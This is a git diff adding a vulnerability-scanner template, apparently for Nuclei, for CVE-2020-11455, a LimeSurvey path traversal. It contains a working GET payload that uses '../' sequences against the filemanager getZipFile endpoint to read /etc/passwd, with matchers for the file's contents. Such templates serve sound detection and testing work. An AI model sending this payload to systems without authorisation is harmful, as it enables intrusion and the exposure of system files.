diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml new file mode 100644 index 0000000000..d272459b58 --- /dev/null +++ b/cves/2020/CVE-2020-11455.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-11455 + +info: + name: LimeSurvey 4.1.11 - Path Traversal + author: daffainfo + severity: high + description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + reference: | + - https://www.exploit-db.com/exploits/48297 + - https://www.cvedetails.com/cve/CVE-2020-11455 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200